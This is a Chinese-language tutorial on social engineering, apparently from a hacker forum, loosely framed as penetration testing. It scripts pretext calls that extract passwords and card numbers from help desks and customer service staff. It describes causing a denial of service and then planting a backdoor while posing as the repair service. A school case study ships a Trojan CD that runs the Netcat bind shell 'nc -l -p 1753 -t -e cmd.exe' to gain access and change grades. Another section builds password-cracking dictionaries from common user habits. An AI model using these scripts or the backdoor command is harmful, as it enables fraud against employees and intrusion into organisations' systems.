社會(huì)工程學(xué)入門(mén)

社會(huì)工程學(xué)入門(mén)By：HUC緣生社會(huì)工程學(xué)入門(mén)社會(huì)工程學(xué)（SocialEngineering）

社會(huì)工程學(xué)是一種通過(guò)對(duì)受害者心理弱點(diǎn)、本能反應(yīng)、好奇心、信任、貪婪等心理陷阱進(jìn)行諸如欺騙、傷害等危害手段。取得自身利益的手法，近年來(lái)已成迅速上升甚至濫用的趨勢(shì)。那么，什么算是社會(huì)工程學(xué)呢？它并不能等同于一般的欺騙手法，社會(huì)工程學(xué)尤其復(fù)雜，即使自認(rèn)為最警惕最小心的人，一樣會(huì)被高明的社會(huì)工程學(xué)手段損害利益。社會(huì)工程學(xué)陷阱就是通常以交談、欺騙、假冒或口語(yǔ)等方式，從合法用戶(hù)中套取用戶(hù)系統(tǒng)的秘密。社會(huì)工程學(xué)是一種與普通的欺騙和詐騙不同層次的手法。因?yàn)樯鐣?huì)工程學(xué)需要搜集大量的信息針對(duì)對(duì)方的實(shí)際情況，進(jìn)行心理戰(zhàn)術(shù)的一種手法。系統(tǒng)以及程序所帶來(lái)的安全往往是可以避免的。而在人性以及心理的方面來(lái)說(shuō)。社會(huì)工程學(xué)往往是一種利用人性脆弱點(diǎn)、貪婪等等的心理表現(xiàn)進(jìn)行攻擊，是防不勝防的。借此我們從現(xiàn)有的社會(huì)工程學(xué)攻擊的手法來(lái)進(jìn)行分析，借用分析來(lái)提高我們對(duì)于社會(huì)工程學(xué)的一些防范方法。熟練的社會(huì)工程師都是擅長(zhǎng)進(jìn)行信息收集的身體力行者。很多表面上看起來(lái)一點(diǎn)用都沒(méi)有的信息都會(huì)被這些人利用起來(lái)進(jìn)行滲透。比如說(shuō)一個(gè)電話(huà)號(hào)碼，一個(gè)人的名字。后者工作ID的號(hào)碼，都可能會(huì)被社會(huì)工程師所利用。在貓撲網(wǎng)上發(fā)現(xiàn)流傳著一句話(huà)，那就是我們所說(shuō)的→人肉搜索達(dá)人，社會(huì)工程學(xué)身體力行者。社會(huì)工程學(xué)入門(mén)

許多人都說(shuō)，關(guān)掉了的計(jì)算機(jī)才是安全的計(jì)算機(jī)，但這是錯(cuò)誤的，找個(gè)借口讓人去辦公室打開(kāi)它就是了。你的對(duì)手不僅僅有一種方法可以從你那里得到他想要的信息，這只是時(shí)間的問(wèn)題。耐心、個(gè)性和堅(jiān)持，這正是欺騙的藝術(shù)的切入點(diǎn)。要擊敗安全措施，一個(gè)攻擊者、入侵者，或是社會(huì)工程師，必須找到一個(gè)方法，從可信用戶(hù)那里騙取信息，或是不露痕跡的獲得訪(fǎng)問(wèn)權(quán)。當(dāng)可信用戶(hù)被欺騙、影響，并被操縱而吐露出敏感信息時(shí)，或是做出了不當(dāng)?shù)呐e動(dòng)，從而讓攻擊者有漏洞可鉆時(shí)，什么樣的安全技術(shù)也無(wú)法保護(hù)住你的業(yè)務(wù)了。正如同密碼專(zhuān)家有時(shí)通過(guò)尋找漏洞來(lái)繞過(guò)加密技術(shù)解出密文一樣，社會(huì)工程師通過(guò)欺騙你的雇員來(lái)繞過(guò)安全技術(shù)。信任的弊端大多數(shù)情況下，成功的社會(huì)工程師都有著很強(qiáng)的人際交往能力。他們有魅力、講禮貌、討人喜歡，并具有快速建立起可親、可信感的特點(diǎn)。一個(gè)經(jīng)驗(yàn)豐富的社會(huì)工程師，使用他自已的戰(zhàn)略、戰(zhàn)術(shù)，幾乎能夠接近任何他感興趣的信息。精干的技術(shù)專(zhuān)家辛辛苦苦地設(shè)計(jì)出安全解決方案來(lái)最小化使用計(jì)算機(jī)的風(fēng)險(xiǎn)，然而卻沒(méi)有解決最大的漏洞――人為因素。盡管我們很聰明，但對(duì)我們?nèi)祟?lèi)――你、我、他的安全最嚴(yán)重的威脅，來(lái)自于我們彼此之間。社會(huì)工程學(xué)入門(mén)

每個(gè)讀者都一直在被社工――他們的父母所控制著，他們有辦法（比如：“這是為了你好”）讓你去做他們認(rèn)為最應(yīng)該做的事。父母?jìng)兙褪鞘褂妙?lèi)似社會(huì)工程學(xué)的方法，巧妙的編出看似有理的故事、理由以及借口，來(lái)達(dá)到他們的目的。是的，我們都被我們的父母所引導(dǎo)――那些樂(lè)善好施的（偶爾也不完全如此）社會(huì)工程師們。

如果某個(gè)陌生人幫了你的忙，然后要你幫他，不要不經(jīng)過(guò)慎重考慮就回報(bào)他的幫助，要看對(duì)方要你做的是什么。社會(huì)工程師找了一個(gè)計(jì)算機(jī)知識(shí)很少的人。他知道的越多，就越可能產(chǎn)生懷疑，或越能斷定是被騙了。計(jì)算機(jī)白癡――對(duì)計(jì)算機(jī)操作和知識(shí)了解很少的人，則很容易遵從你的指示。他太容易掉入“只需下一個(gè)小程序”這樣的陷井了，因?yàn)樗麑?duì)一個(gè)軟件程序可能造成的損害一無(wú)所知。而且，他很可能不知道他冒著風(fēng)險(xiǎn)放到網(wǎng)絡(luò)上的信息的價(jià)值。

社會(huì)工程學(xué)入門(mén)一、社會(huì)工程學(xué)的應(yīng)用與防護(hù)社會(huì)工程學(xué)入門(mén)1、假冒技術(shù)支持

社會(huì)工程攻擊的方法何很多，下面介紹假冒技術(shù)支持戰(zhàn)術(shù)：可以考察以下用于獲取數(shù)據(jù)網(wǎng)絡(luò)訪(fǎng)問(wèn)權(quán)的不同偽裝示例。最成功的社會(huì)工程師是那些能夠以創(chuàng)新的方法勸導(dǎo)其他人向其提信息的人。社會(huì)工程的最常見(jiàn)形式是假冒技術(shù)支持．這里．假冒一名正在手機(jī)信息的技術(shù)支持工程師，收集的信息包括口令。滲透測(cè)試者：你好，我是技術(shù)支持部的張濤你注意到你的系統(tǒng)變慢了嗎？受騙用戶(hù)：還好，似乎還不太慢滲透測(cè)試者：嗯，我們看到網(wǎng)絡(luò)速度下降很多好的．讓我登錄你的PC上，測(cè)試一下你的機(jī)器。你的用戶(hù)名是jeouser，對(duì)嗎?

受騙用戶(hù)：是。

一般來(lái)說(shuō)，用戶(hù)名與電子郵件地址中的名稱(chēng)相同。比如，。那么在企業(yè)網(wǎng)絡(luò)中的用戶(hù)名很可能就是jeouser。我們可以從大多數(shù)企業(yè)的Web網(wǎng)站收集電子郵什地址。社會(huì)工程學(xué)入門(mén)滲透測(cè)試者：很好，讓我查一查你的口令嗯，系統(tǒng)太慢了，你的口令是什么？受騙用戶(hù)：是abc123。滲透測(cè)試者：好，我進(jìn)去了。似乎還不太壞。一定是沒(méi)有受到同樓層其他用戶(hù)的影響，奇怪。好了，我要查一查其他樓層的情況。謝謝你。受騙用戶(hù)：也謝謝你的幫助。社會(huì)工程學(xué)入門(mén)

這個(gè)示例展示了一個(gè)技術(shù)支持假冒的策略。在現(xiàn)實(shí)場(chǎng)景中，應(yīng)該向用戶(hù)詢(xún)問(wèn)更多問(wèn)題．以便建立用戶(hù)對(duì)你的信任。在了解企業(yè)內(nèi)部網(wǎng)絡(luò)的過(guò)程中加入一些幽默元素。企業(yè)網(wǎng)絡(luò)中最容易被忽略和未加保護(hù)的區(qū)域是在家庭中辦公的遠(yuǎn)程工作人員使用的機(jī)器。作為滲透測(cè)試人員，應(yīng)該測(cè)試這些遠(yuǎn)程用戶(hù)。通常情況下，對(duì)這些人實(shí)施社會(huì)工程更容易獲得成功，原因在于他們遠(yuǎn)離辦公室，而在辦公室的人員可能會(huì)受到安全培訓(xùn)和提醒。遠(yuǎn)程用戶(hù)通常是通過(guò)電話(huà)或支持人員的幫助來(lái)處理一些設(shè)置情況的。社會(huì)工程學(xué)入門(mén)2、第三方假冒

技術(shù)支持假冒的缺點(diǎn)之一是這個(gè)假冒是在太常見(jiàn)了。公司已經(jīng)意識(shí)到這種假冒技巧并要求防范。另一種技巧是第三方假冒，它能夠更成功的獲取內(nèi)部信息。

滲透測(cè)試者：你好，我是“值得信賴(lài)咨詢(xún)公司”的工作人員，我想給你介紹一下我們公司新的防火墻產(chǎn)品。受騙用戶(hù)：不錯(cuò)，但我們對(duì)現(xiàn)有產(chǎn)品已經(jīng)很滿(mǎn)意了滲透測(cè)試者：真的嗎?你們正在使用哪種類(lèi)型的防火墻·

受騙用戶(hù)：我們現(xiàn)在用PlX和Netscreell防火墻滲透測(cè)試者：好，這兩款產(chǎn)品都十分優(yōu)秀，但你注意到了像Smurl和PingOfDeath這樣的拒絕服務(wù)攻擊的風(fēng)險(xiǎn)了嗎。你的防火墻能夠抵擋這些類(lèi)型的攻擊嗎?(Smurf攻擊是以最初發(fā)動(dòng)這種攻擊的程序名Smurl來(lái)命名。這種攻擊方法結(jié)合使用了IP欺騙和ICMP回復(fù)方法使大量網(wǎng)絡(luò)傳輸充斥目標(biāo)系統(tǒng)，引起目標(biāo)系統(tǒng)拒絕為正常系統(tǒng)進(jìn)行服務(wù))(這種攻擊通過(guò)發(fā)送大于65536字節(jié)的ICMP包促操作系統(tǒng)崩潰；通常不可能發(fā)送大于65536個(gè)字節(jié)的ICMP包，但可以把報(bào)文分割成片段，然后在目標(biāo)主機(jī)上重組：最終會(huì)導(dǎo)致被攻擊目標(biāo)緩沖區(qū)溢出。)社會(huì)工程學(xué)入門(mén)受騙用戶(hù)：當(dāng)然能。滲透測(cè)試者：不錯(cuò)，我知道你對(duì)現(xiàn)有的產(chǎn)品很滿(mǎn)意現(xiàn)在，我們的產(chǎn)品能夠通過(guò)特殊過(guò)濾有效地保護(hù)電子郵件服務(wù)器。你的產(chǎn)品能夠保護(hù)郵件服務(wù)器嗎?

受騙用戶(hù)：這個(gè)問(wèn)題我們并不關(guān)心，因?yàn)槲覀儾辉试S互聯(lián)網(wǎng)上的郵件進(jìn)入到我們的系統(tǒng)中。我們的郵件都來(lái)自總部。滲透測(cè)試者：喔，看起來(lái)你對(duì)現(xiàn)有產(chǎn)品很滿(mǎn)意。我不浪費(fèi)你的時(shí)間了。我把我的電話(huà)號(hào)碼和姓名留給你，在你需要的時(shí)候可以給我打電話(huà)（留下一個(gè)假名和假的電話(huà)號(hào)碼原因在于目標(biāo)或許永遠(yuǎn)不會(huì)打這個(gè)電話(huà))。

在這個(gè)簡(jiǎn)短的示倒中，你能夠發(fā)現(xiàn)防火墻的類(lèi)型及它的一些配置。你會(huì)了解到，該公司或許阻塞或限制了ICMP協(xié)議，Smurf、和PingOfDeath攻擊使用了這個(gè)協(xié)議。你還知道電子郵件系統(tǒng)使用的TCP端口25不能通過(guò)互聯(lián)網(wǎng)訪(fǎng)問(wèn)。這樣就節(jié)省了掃描這些協(xié)議的大量時(shí)間，減少了被發(fā)現(xiàn)的風(fēng)險(xiǎn)。社會(huì)工程學(xué)入門(mén)

第三方假冒的另一個(gè)示例是你假裝為某個(gè)貿(mào)易雜志的記者，你正在做公司產(chǎn)品的評(píng)論。絕大多數(shù)員工期待知道他們會(huì)在雜志中出現(xiàn)。在他們的熱功期待中，經(jīng)常會(huì)送出免費(fèi)產(chǎn)品，泄露不應(yīng)該與外界分享的內(nèi)部信息。這就是為什么公關(guān)人員應(yīng)該出現(xiàn)在會(huì)面中．樣品產(chǎn)品只應(yīng)該在驗(yàn)證了訪(fǎng)問(wèn)者的身份之后才能夠發(fā)放的原因。你或許會(huì)發(fā)現(xiàn)，當(dāng)IT經(jīng)理認(rèn)為他正在面談?dòng)嘘P(guān)他的數(shù)據(jù)安傘時(shí)．他愿意泄露什么的信息。社會(huì)工程學(xué)入門(mén)

滲透測(cè)試者：到目前為止，你為保護(hù)你的基礎(chǔ)設(shè)施的安奎采取的步驟給我留下了很深刻的印象、(拍馬屁是打開(kāi)更多信息大門(mén)的第一步，)受騙用戶(hù)：謝謝，在我們公司，我們把安全看得十分重要。滲透測(cè)試者：我已經(jīng)感受到了。你們公司強(qiáng)制實(shí)施什么安全策略了嗎？受騙用戶(hù)：嗯，當(dāng)然，我們制定了可接受的互聯(lián)網(wǎng)采略和口令策略，公司的所有員工在進(jìn)入公司時(shí)都要簽署這些策略。滲透測(cè)試者：很不錯(cuò)．詳細(xì)談一談，這很有趣。受騙用戶(hù)：嗯，例如，我們的口令策略要求所有用戶(hù)的口令至少要八個(gè)字符長(zhǎng)．并且同時(shí)包含字母和數(shù)字。要求口令每三個(gè)月就要更換一次口令。滲透測(cè)試者：真的不錯(cuò)，我聽(tīng)說(shuō)，有些公司也強(qiáng)制實(shí)施這樣的策略，但員工可能會(huì)寫(xiě)下他們的口令，并把它放在鍵盤(pán)下面你們公司存在這樣的問(wèn)題嗎？受騙用戶(hù)：哈哈哈．是的，總是滋生這樣的情況我希望能蝣杜絕發(fā)生這樣的事情．我敢打賭．我們的用戶(hù)中有50％上的用戶(hù)會(huì)把口令寫(xiě)在他們辦公桌的某個(gè)地方。

這個(gè)簡(jiǎn)短的會(huì)面揭示，獲取進(jìn)入公司權(quán)限的最容易的辦法就是在用戶(hù)的辦公桌上尋找口令。你可在當(dāng)天的晚些時(shí)候進(jìn)入辦公樓．許要求使接待休息事。在下班之后(以及打掃衛(wèi)生人員進(jìn)來(lái)之前)，你可以離開(kāi)休息室．走進(jìn)辦公率．在辦公桌上尋找能夠得到訪(fǎng)問(wèn)權(quán)的口令。社會(huì)工程學(xué)入門(mén)

這里是曾經(jīng)發(fā)生的一個(gè)示例。幾年前，馬杰去一家不動(dòng)產(chǎn)公公司在管理員離開(kāi)之后的安全性。當(dāng)他走到管理員的辦公桌前他發(fā)現(xiàn)了幾張馬匹的照片，馬杰猜想他一定擁有其中的一些馬匹，就故意對(duì)旁邊的小隔間大聲感嘆，“哇，多么漂亮的馬呀!，這是他的馬嗎?”在得到了肯定之后，馬杰問(wèn)“他們叫什么名字?”果然，網(wǎng)絡(luò)管理員使用的口令是這些馬匹的名字之一。社會(huì)工程學(xué)入門(mén)3、末端用戶(hù)假冒、客戶(hù)假冒、反向社會(huì)工程

一、末端用戶(hù)假冒如果你能夠進(jìn)入到企業(yè)辦公樓中，你可以假冒末端用戶(hù)打電話(huà)給支持中心。從找到一臺(tái)未用的工作站開(kāi)始。當(dāng)它引導(dǎo)起來(lái)后，工作站通常顯示最后一個(gè)使用它的用戶(hù)的名稱(chēng)。按下來(lái)，多次在密碼提示框中鍵入一些偽造的口令。正常情況下這將導(dǎo)致該賬戶(hù)被鎖起來(lái)并要求出系統(tǒng)管理員解鎖。打電話(huà)給支持中心，并假裝你就是那個(gè)用戶(hù)。告訴IT工作人員你忘記了口令，并且已經(jīng)把自己鎖在了網(wǎng)絡(luò)之外。之后他會(huì)解鎖你的賬戶(hù)并向你提供一個(gè)新的口令?，F(xiàn)在你就以那個(gè)用戶(hù)置錄到網(wǎng)絡(luò)上。你會(huì)為這個(gè)伎倆成功的概率之高感到吃驚。社會(huì)工程學(xué)入門(mén)二、客戶(hù)假冒

如果說(shuō)還有什么地方需要社會(huì)工程師進(jìn)行測(cè)試，那就是客戶(hù)服務(wù)中心。客戶(hù)服務(wù)代表有權(quán)限訪(fǎng)問(wèn)賬號(hào)、信用卡號(hào)碼以及社會(huì)安全號(hào)碼(在美國(guó)，其他國(guó)家往往是身份證號(hào)碼)。假設(shè)滲透測(cè)試人員使用下面的場(chǎng)景打電話(huà)給信用卡客戶(hù)服務(wù)中心：滲透測(cè)試者：喂，我要查一查我卡上的余額。受騙用戶(hù)：沒(méi)問(wèn)題，你的賬號(hào)是多少?

滲透測(cè)試者：不好意思，信用卡現(xiàn)在沒(méi)有在我手邊。但我有我的地址。(你會(huì)發(fā)現(xiàn)可以很容易地使用電話(huà)號(hào)碼本采查到地址)

受騙用戶(hù)：沒(méi)有你的賬號(hào)號(hào)碼，我無(wú)法給你查賬戶(hù)信息。滲透測(cè)試者：幫幫忙吧。今天是我50周年結(jié)婚紀(jì)念日，我的妻子現(xiàn)在正在醫(yī)院。我想在下班后給她買(mǎi)一些補(bǔ)品，但不能肯定我的賬戶(hù)上是否還有足夠的錢(qián)。你能幫我查一查余額還有多少嗎?謝謝你。受騙用戶(hù)：好吧。你的地址是什么?

假設(shè)告訴了對(duì)方某個(gè)地址，客戶(hù)服務(wù)人員說(shuō)出了余額，繼續(xù)下面的談話(huà)：滲透測(cè)試者：真是太感謝你了。我想網(wǎng)上訂購(gòu)一些東西，在今天就交竹到我妻子那里。給她一個(gè)驚喜。嗯，但我現(xiàn)在手頭沒(méi)有賬戶(hù)號(hào)碼。你可以幫我念一念賬戶(hù)號(hào)碼嗎?

受騙用戶(hù)：好的。號(hào)碼是……社會(huì)工程學(xué)入門(mén)

但是信用卡公司不會(huì)落入這樣的陷阱。他們?yōu)槭裁床粫?huì)落入這類(lèi)陷阱的原因是他們雇傭了滲透測(cè)試人員作為社會(huì)工程師對(duì)客戶(hù)代表進(jìn)行了測(cè)試，并制定了嚴(yán)厲的懲罰措施。正是這個(gè)原因，偽裝為公司內(nèi)部人員打電話(huà)通常會(huì)更容易成功。社會(huì)工程學(xué)入門(mén)三、反向社會(huì)工程

反向社會(huì)工翟比前面舶示例要略微復(fù)雜一些，但它的有效性不容懷疑。反向社會(huì)工程(ReverseSocialEngineering，RSE)由下述三步組成：

·破壞·廣告·支持在反向社會(huì)工程中，角色顛倒了過(guò)來(lái)。這里，不是像前一節(jié)講述的那樣打電話(huà)尋求幫助．攻擊者讓用戶(hù)給他打電話(huà)來(lái)尋求幫助。反向社會(huì)工程的操作方法是．首先破壞目標(biāo)網(wǎng)絡(luò)，這可以通過(guò)拒絕服務(wù)攻擊(DoS)來(lái)實(shí)現(xiàn)。之后．向該公司發(fā)送廣告，以網(wǎng)結(jié)安全工程師的身份推薦你的服務(wù)，說(shuō)明在對(duì)抗拒絕服務(wù)攻擊方面體的特殊技能。當(dāng)公司雇用了你的服務(wù)之后，你開(kāi)始提供支持井修復(fù)問(wèn)題，與此同時(shí)。在公司網(wǎng)絡(luò)中安裝后門(mén)程序，這樣你可以在以后需要的時(shí)候進(jìn)入到公司網(wǎng)絡(luò)中。成功實(shí)施反向社會(huì)工程的最佳途徑并不是一開(kāi)始就發(fā)起攻擊，而足等待到互聯(lián)網(wǎng)上傳播一種新的病毒時(shí)發(fā)起攻擊。以在病毒防護(hù)方面的特殊技能作為內(nèi)容發(fā)布你的服務(wù)廣告，當(dāng)你在修復(fù)公司問(wèn)題的時(shí)候，建立一種通過(guò)開(kāi)啟防火墻或安裝后門(mén)程序的方法，打開(kāi)從互聯(lián)網(wǎng)上進(jìn)入該公司網(wǎng)絡(luò)的通道。作為滲透測(cè)試人員，這一點(diǎn)變得極為困難，原因在于在第一次測(cè)試之后．IT工作人員開(kāi)始熟悉了你。對(duì)于利用下次病毒在互聯(lián)阿上發(fā)作進(jìn)行此類(lèi)攻擊，你應(yīng)該得到管理層的書(shū)面允許。社會(huì)工程學(xué)入門(mén)

這個(gè)案例研究要求滲透測(cè)試者李明被應(yīng)用來(lái)對(duì)一所小學(xué)做社會(huì)工程測(cè)試。其目標(biāo)是獲取學(xué)校系統(tǒng)的訪(fǎng)問(wèn)權(quán)限修改學(xué)生的成績(jī)。社會(huì)工程學(xué)入門(mén)

李明要做的第一步工作就是了解這所學(xué)校使用的學(xué)籍管理軟件。他開(kāi)始在互聯(lián)同上進(jìn)行搜索．尋找通用的學(xué)籍管理軟件。李明找到了一些這樣的軟件，包括ActiD、Gradebook、AutoGrad、GradeGenie、ThinkWave，Next5G,ading、共拓學(xué)籍管理、點(diǎn)通學(xué)藉管理等。李明也瀏覽了一些教育論壇．尋找討論各學(xué)搜使用IT技術(shù)的情況。通過(guò)收集這方面的情況，事明找到了附近的一所小學(xué)，名字為”東方小學(xué)”。掌握了這些情況之后，李明在打電話(huà)時(shí)就胸有成竹了。李明打電話(huà)給這所學(xué)校，請(qǐng)求與負(fù)責(zé)技術(shù)的人員通話(huà)。對(duì)方將他介紹紿一位名叫馬濤的技術(shù)人員。下面是他們之間的淡話(huà)：

李明：你好，是馬濤馬先生嗎?我是李明，我在附近的“惠民小學(xué)”工作領(lǐng)導(dǎo)剛分配我負(fù)責(zé)學(xué)校的技術(shù)工作，但說(shuō)實(shí)話(huà)，我對(duì)技術(shù)了解不多，因此我希望能夠得到你的幫助。至此，事明已經(jīng)說(shuō)出了他的期待。由于人們通常都樂(lè)于幫助別人，李明認(rèn)如馬濤會(huì)樂(lè)于幫助他。

馬濤；李明．你好。你在惠民小學(xué)？趙華怎么了?我知道她在那所學(xué)校負(fù)責(zé)技術(shù)李明：呵呵，她現(xiàn)在不做這個(gè)工作了。但現(xiàn)拉她升官了。我是她的手下，她是一個(gè)很好的人。

社會(huì)工程學(xué)入門(mén)

盡管看起來(lái)李明就要露餡了，但謊稱(chēng)趙華升職了。李明還通過(guò)贊揚(yáng)她的話(huà)語(yǔ)來(lái)使談話(huà)更輕松起來(lái)。

李明：最近，趙華讓我考察一下新的學(xué)籍管理軟件的事情。我看了幾個(gè)軟件比如：共拓學(xué)籍管理、一點(diǎn)通學(xué)藉管理等．但我不能確定哪一個(gè)軟件最靈活，你們用的是哪個(gè)學(xué)籍管理軟件？李明陳述了自己在學(xué)籍管理軟件方面的知識(shí)，來(lái)免除馬濤對(duì)自己教育背景的懷疑．李明還詢(xún)問(wèn)馬濤哪一個(gè)軟件軟件最靈活，原因在于他在論壇中已經(jīng)看到這些軟件的流行程度和靈活程度的排名。

馬濤：我們一直在使用Gradebook．對(duì)這個(gè)軟件我們很滿(mǎn)意。至此，李明繼續(xù)問(wèn)一些與這個(gè)軟件有關(guān)的問(wèn)題，依據(jù)是事先對(duì)這個(gè)軟件的了解。當(dāng)談話(huà)結(jié)束時(shí)，李明已經(jīng)知道了這個(gè)學(xué)校使用的學(xué)籍軟件的類(lèi)型．負(fù)責(zé)技術(shù)的工作人員的姓名是馬濤。在下一個(gè)階段，李明選擇了另一個(gè)人與馬濤聯(lián)系，原因在于他可能會(huì)聽(tīng)出李明的聲音。此外，由于馬濤是位男士，常言道，男女搭配．干活不累，因此，李明請(qǐng)他的同事王晨冒充ThinkWave的銷(xiāo)售代表來(lái)打這個(gè)電話(huà)。在與馬濤聯(lián)系之前，王晨等待了數(shù)周，以避免惹人注目。社會(huì)工程學(xué)入門(mén)

王晨：你好，是馬濤嗎?我是ThinkWave公司的業(yè)務(wù)代表王晨。我們想請(qǐng)你參加我們的客戶(hù)改進(jìn)計(jì)劃，作為回報(bào)，在未來(lái)軟件升級(jí)時(shí)，貴校可以得到20％的折扣。

由于大多數(shù)公辦學(xué)校的資金都比較緊張，因此可以合理地認(rèn)為馬濤會(huì)被這個(gè)省錢(qián)的說(shuō)辭打動(dòng)。

馬濤：是嗎?需要我做些什么?

王晨：這樣，我將向你發(fā)送一款報(bào)告軟件，你把它放在服務(wù)器上。在發(fā)送給你的郵件中，包含了這個(gè)軟件的配置方法。這個(gè)軟件的主要功能是。在系統(tǒng)出現(xiàn)任何錯(cuò)誤時(shí)．他都生成一份報(bào)告，并發(fā)送給我們。它不發(fā)送任何個(gè)人信息．僅僅發(fā)送計(jì)算機(jī)的類(lèi)型、發(fā)生錯(cuò)誤的時(shí)間、發(fā)生錯(cuò)誤時(shí)系統(tǒng)中運(yùn)行的進(jìn)程。通過(guò)從我們的客戶(hù)那里收集這些信息．我們希望在未來(lái)的發(fā)行版本中能夠減少軟件錯(cuò)誤。馬濤：很好呀。在這次通話(huà)之后，李明從網(wǎng)上下載ThinkWave的標(biāo)志，并在信紙的抬頭上印上這個(gè)標(biāo)志。李明在網(wǎng)上找到FainkWave的地址，并向馬濤寄送一個(gè)包裹，寄件人地址寫(xiě)上ThinkWave的地址。包括中包含了一張帶有Nctcat實(shí)用程序(當(dāng)然你也可以使用其他的木馬程序)的CD和一封信，信的內(nèi)容為：社會(huì)工程學(xué)入門(mén)馬先生，你好：感謝參與本公司客戶(hù)改進(jìn)計(jì)劃。我們確認(rèn)你的協(xié)助將會(huì)幫助改進(jìn)我們產(chǎn)品未來(lái)發(fā)行版本的質(zhì)量。與這封信一起寄給您的十一章包含報(bào)告軟件的CD。當(dāng)系統(tǒng)中發(fā)生錯(cuò)誤時(shí)這個(gè)軟件將會(huì)生成一份報(bào)告，并發(fā)送給我們。我向你保證不會(huì)發(fā)送任何個(gè)人信息。安裝這個(gè)報(bào)告程序的方法是將CD放到服務(wù)器光驅(qū)中，它將自動(dòng)啟動(dòng)安裝程序，如果沒(méi)有啟動(dòng)的話(huà)，使用setup.exe安裝。這個(gè)報(bào)告程序使用TCP端口1753，您需要在防火墻上打開(kāi)這個(gè)端口。打開(kāi)這個(gè)端口的具體方法，請(qǐng)參閱您的防火墻文檔。通過(guò)參與我們的客戶(hù)改進(jìn)計(jì)劃，在未來(lái)軟件升級(jí)時(shí)，你將自動(dòng)得到20%的折扣。感謝你的支持和參與。

祝身體健康、一切順利！

ThinkWave公司代表王晨

2007年4月26日社會(huì)工程學(xué)入門(mén)CD的內(nèi)容是李明生成的一個(gè)安裝程序，它將Netcat安裝在服務(wù)器硬盤(pán)的根目錄下：Netcal是一個(gè)后門(mén)應(yīng)用程序，它為李明提供了進(jìn)入服務(wù)器的遠(yuǎn)程訪(fǎng)問(wèn)。安裝腳本使用下面的參數(shù)啟動(dòng)Netcat：

c:\nc-l-p1753-t-ecmd.exe

數(shù)天之后，李明請(qǐng)王晨打電話(huà)給馬濤。

王晨：你好，我是王晨，我這次打電話(huà)是想問(wèn)一問(wèn)你，在安裝我們的報(bào)告軟件時(shí)遇到什么問(wèn)題了沒(méi)有?

馬濤：沒(méi)有，一點(diǎn)問(wèn)題也沒(méi)有。王晨：這就好。我們就想聽(tīng)到這樣的話(huà)?，F(xiàn)在我們需要知道你的外部IP地址，以便在我們收到報(bào)告時(shí)，知道這份報(bào)告來(lái)自你那里。馬濤：沒(méi)問(wèn)題。我查一查，找到了，IP地址是200．300．55．28．王晨：太謝謝你了。如果你有什么需要，就告訴我們。你有我們的技術(shù)支持電話(huà)號(hào)碼嗎。馬濤：我有。社會(huì)工程學(xué)入門(mén)然后~~~~你懂的~~~~~社會(huì)工程學(xué)入門(mén)3、密碼心理學(xué)

（轉(zhuǎn)自紅盟論壇）

很多黑客的入門(mén)是從破解口令開(kāi)始的！而是解密口令變成了由為重要的一門(mén)畢修課，今天我想談的不是如何去破解口令，而是一篇關(guān)于口令的心理學(xué)文章！如果下述的一些列子正好與你的口令設(shè)置大同小異，那么請(qǐng)你馬上改了它，你的口令被破解的可能性很大很大！

社會(huì)工程學(xué)入門(mén)

當(dāng)我們?cè)O(shè)定口令時(shí)一般的人都會(huì)用自己熟悉的單詞，這樣能使他們便于記憶！沒(méi)辦法，人天生就懶惰！那么哪些單詞是他們?nèi)菀子涀〉哪?！是不是沒(méi)有規(guī)律呢？非也！非也！我們可以來(lái)做一個(gè)心理試驗(yàn)！試驗(yàn)是這樣的我從大學(xué)中抽出了一百名學(xué)生，然后要他們寫(xiě)下二個(gè)單詞！并告訴他們這個(gè)單詞是用于電腦的口令非常重要，且將來(lái)的使用率也很高！要求他們盡量慎重考慮！

社會(huì)工程學(xué)入門(mén)1，用自己的中文拼音者最多。37人這就告訴我們口令破解字典檔應(yīng)針對(duì)中國(guó)的特列！要用一些中文姓名拼音的字典檔！如：wanghai,zhangli,shenqin,等等！

2，用常用的英文單詞23人其中許多人都用了很有特定意義的單詞，如:hello,good,happy,anything,等等！

3，用計(jì)算機(jī)的中經(jīng)常出現(xiàn)的單詞18人這些單詞中還有操作系統(tǒng)的命令，如：system,

command,copy,harddisk,mouse,等等！

4，用自己的出生日期7人其中年月日各不相同！但其中有3人用了中國(guó)常用

的日期表示方法！如970203,199703.050498等！

上述測(cè)試中兩個(gè)單詞相同的有21人，接近相同的有33人！雖然還有一些人用的我沒(méi)給他們歸類(lèi)，但還是有規(guī)律的！

希望上面的心理測(cè)試能給你的解密帶來(lái)一寫(xiě)啟示！而不要在盲目的用暴力法了！社會(huì)工程學(xué)入門(mén)如何做一個(gè)紅客!新手必看！?。?/p>

1.世界上的技術(shù)是人類(lèi)發(fā)明出來(lái)的，但并不是說(shuō)人家就有義務(wù)給你免費(fèi)分享

2.不要老是抱怨沒(méi)有高手教你，你應(yīng)該看到你自己本身的程度提出的問(wèn)題是不是值得人家花時(shí)間，你的時(shí)間寶貴人家也是

3.最好的學(xué)習(xí)地方是論壇上，人家已經(jīng)發(fā)出來(lái)的帖子還有整集整集的資料，你沒(méi)有資格去要求人家重新再告訴你一次，如果讓你把一句話(huà)重復(fù)給幾萬(wàn)個(gè)人